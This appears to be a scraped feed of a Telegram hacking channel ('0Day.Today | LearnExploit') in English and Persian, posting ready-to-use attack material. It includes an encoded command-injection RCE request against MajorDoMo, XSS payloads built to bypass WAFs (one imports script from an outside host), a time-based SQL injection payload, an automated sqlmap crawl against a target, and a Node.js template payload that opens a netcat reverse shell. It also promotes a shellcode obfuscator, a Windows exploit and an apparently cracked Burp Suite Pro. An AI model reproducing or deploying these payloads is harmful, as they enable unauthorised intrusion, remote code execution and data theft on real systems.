0Day.Today | Learn Exploit | Zero World | Dark web |
16.1K subscribers
1.07K photos
61 videos
444 files
1K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
MajorDoMo thumb RCE

GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``

#rce #Poc #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'

#Fuzz #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Do you know that sqlmap has its own crawler? Run in the background easily:

sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12

#sql #sql_injection
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Stored Xss payload 🔥

Payload for bypass waf:

<Img Src=OnXSS OnError=confirm("@Learnexploit")>

#xss #Bypass #WAF #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Xss Payload 💎

j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:console.log(location)

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
XSS could be be triggers in url itself, no need for parameter injection ⚡️

Payloads:


%3Csvg%20onload=alert(%22@Learnexploit88%22)%3E


%3Cimg%20src=x%20onerror=alert(%22@Learnexploit%22)%3E

#Xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🌐 Ominis OSINT: Secure Web-Search 🌐

📊 Features:
🚀 Enhanced User Interface: Enjoy a redesigned interface for a seamless experience, suitable for both novice and experienced users.
🔎 Expanded Digital Reconnaissance: Conduct thorough investigations with advanced tools to gather and analyze publicly available information from diverse online sources.
💡 Threading Optimization: Experience faster execution times with optimized threading, improving efficiency and reducing waiting periods during username searches.
📊 Detailed Results: Gain comprehensive insights from search results, including detailed information extracted from various sources such as social profiles, mentions, and potential forum links.
⚙️ Proxy Validation: The tool validates proxies for secure and efficient web requests, ensuring anonymity and privacy during the search process. This feature enhances the reliability of the search results by utilizing a pool of validated proxies, mitigating the risk of IP blocking and ensuring seamless execution of the search queries.
🕵️‍♂️ Human-like Behavior Mimicking: To mimic human-like behavior and avoid detection by anti-bot mechanisms, the tool randomizes user agents for each request. This helps in making the requests appear more natural and reduces the likelihood of being flagged as automated activity.
🛡 Randomized Proxy Agents: In addition to proxy validation, the tool utilizes randomized proxy agents for each request, further enhancing user anonymity. By rotating through a pool of proxies, the tool reduces the chances of being tracked or identified by websites, thus safeguarding user privacy throughout the reconnaissance process.
🔍 Username Search: Searches a list of URLs for a specific username. Utilizes threading for parallel execution. Provides detailed results with URL and HTTP status code.

🔼 Installation:
cd Ominis-Osint
pip install -r requirements.txt
python3 Ominis.py


😸 Github

⬇️ Download
🔒 BugCod3

#Python #Osint #Search #Engin #Tools

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Real fucking shellcode encryptor & obfuscator tool

Github

#tools #shellcode
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👁 Burpsuite Pro 👁

🔥 v2024.3.1.2

🔔 BurpBountyPro_v2.8.0

📂 README (en+ru) included, plz read it before run BS.

🔼 Run this version With Java SE JDK 22

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
تبلیغات داخل چنل بزرگ Learnexploit

1 hafte am takhfif gozashtim ro hame 💎

@LearnExploitAds
If you discover a node.js template area, you should try triggerable node payload 🔥; require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}

so you can get RCE
💎

#rce #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
WebExploit Tools 🔥 advanced web hacking and hacker toolkit ⚡️

Tested on Kali Linux & Termux

Github

#Linux #Tools
——————‌
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
WebExploit Tools 🔥 advanced web hacking and hacker toolkit ⚡️ Tested on Kali Linux & Termux Github #Linux #Tools ——————‌ 0Day.Today @LearnExploit @Tech_Army
دولوپرای عزیز دوست داشتن میتونن مثل ایشون ابزاراشونو به ما معرفی کنن ، ما ام حمایت میکنیم حتما 🤠

ری اکشناتونم پایینه ها یه ابزار وطنی گزاشتیم حداقل با ری اکشن یه انرژی بدید بهشون و اینکه استار داخل گیت هابم یادتون نره ❤️
Sql Injection

Payload : -10'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z

Parameter: cart/-10+payload

#BugBounty #Tips #sql_injection

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
سلام خدمت دوستان عزیز ✌️

به گروه کانال LearnExploit جوین بدید📿

🚫 قوانین
:

1 - لطفا سوالات و پاسخ خودتون رو در حد امکان در یک پیام بفرستید.
2 - ارسال مطالب هماهنگ با موضوع چنل.
3 - در صورت زیر سوال بردن هرگونه نژاد بدون استثنا از گروه حذف میشوید.
4 - بحث سیاسی داخل گپ ممنوع .

+ برای حمایت از ما و کانال ، لطفا مطالب کانال رو نشر دهید .

با تشکر ادمین گروه آموزشی LearnExploit

کانال LearnExploit :
📎 @LearnExploit
🤠 IR0Day.Today Boy's

لینک گروه LearnExploit :
🗣 @LearnExploit_Group
Windows 11 24H2 NT Exploit

Github

#Windows #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Xss Payload

<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>

#xss #Bypass #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army
short XSS polyglot

'/*\'/*"/*\"/*</Script>
<Input/AutoFocus/OnFocus=/**/
(import(/https:\\X55.is/.source))//>

#Xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
نات کوین مینت شد!
EQAvlWFDxGF2lXm67y4yzC17wYKD9A0guwPkMs1gOsM__NOT

#news
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Alice gets ROOT when ROOT does 'su alice'.

Github

#Linux #Trick
——————‌
0Day.Today
@LearnExploit
@Tech_Army